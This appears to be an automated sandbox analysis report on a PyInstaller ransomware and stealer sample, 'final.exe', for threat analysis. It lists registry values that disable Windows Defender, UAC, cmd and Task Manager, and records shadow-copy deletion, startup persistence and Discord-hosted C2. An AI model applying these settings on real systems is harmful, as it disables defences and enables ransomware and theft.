Malware Analysis Report

2025-06-15 23:27

Sample ID 250121-maa8ssykfs
Target final.exe
SHA256 a65610a00b2d16c046d140cc4bd9e634e62b1de6367c496221b9631545b8736a
Tags
defense_evasion discovery evasion execution exploit impact persistence privilege_escalation pyinstaller ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a65610a00b2d16c046d140cc4bd9e634e62b1de6367c496221b9631545b8736a

Threat Level: Known bad

The file final.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution exploit impact persistence privilege_escalation pyinstaller ransomware spyware stealer trojan

Modifies Windows Defender DisableAntiSpyware settings

Modifies Windows Defender Real-time Protection settings

UAC bypass

Deletes shadow copies

Drops file in Drivers directory

Possible privilege escalation attempt

Command and Scripting Interpreter: PowerShell

Disables cmd.exe use via registry modification

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Executes dropped EXE

Modifies file permissions

Impair Defenses: Safe Mode Boot

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Drops desktop.ini file(s)

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Hide Artifacts: Hidden Files and Directories

Enumerates processes with tasklist

Browser Information Discovery

Detects Pyinstaller

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Enumerates physical storage devices

System Network Configuration Discovery: Wi-Fi Discovery

Suspicious use of FindShellTrayWindow

Kills process with taskkill

Interacts with shadow copies

System policy modification

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Uses Volume Shadow Copy service COM API

Checks SCSI registry key(s)

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Enumerates system info in registry

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-01-21 10:15

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-21 10:15

Reported

2025-01-21 10:26

Platform

win11-20241007-en

Max time kernel

630s

Max time network

635s

Command Line

"C:\Users\Admin\AppData\Local\Temp\final.exe"

Signatures

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\$Sys-Manager\systemservice92.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SYSTEM32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Disables RegEdit via registry modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

defense_evasion

Disables cmd.exe use via registry modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\$Sys-Manager\systemservice92.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\$Sys-Manager\systemservice92.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a4r3ezw3okvw9zam.exe C:\$Sys-Manager\systemservice92.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a4r3ezw3okvw9zam.exe C:\$Sys-Manager\systemservice92.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe C:\$Sys-Manager\systemservice92.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe C:\$Sys-Manager\systemservice92.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l3p5s4q51fqzem5z.exe C:\Users\Admin\AppData\Local\Temp\final.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l3p5s4q51fqzem5z.exe C:\Users\Admin\AppData\Local\Temp\final.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A

Impair Defenses: Safe Mode Boot

defense_evasion
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Minimal C:\$Sys-Manager\systemservice92.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\$Sys-Manager\desktop.ini C:\Users\Admin\AppData\Local\Temp\final.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api64.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A api64.ipify.org N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000004c79797f2efc73ee0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800004c79797f0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809004c79797f000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d4c79797f000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000004c79797f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\$Sys-Manager\systemservice92.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
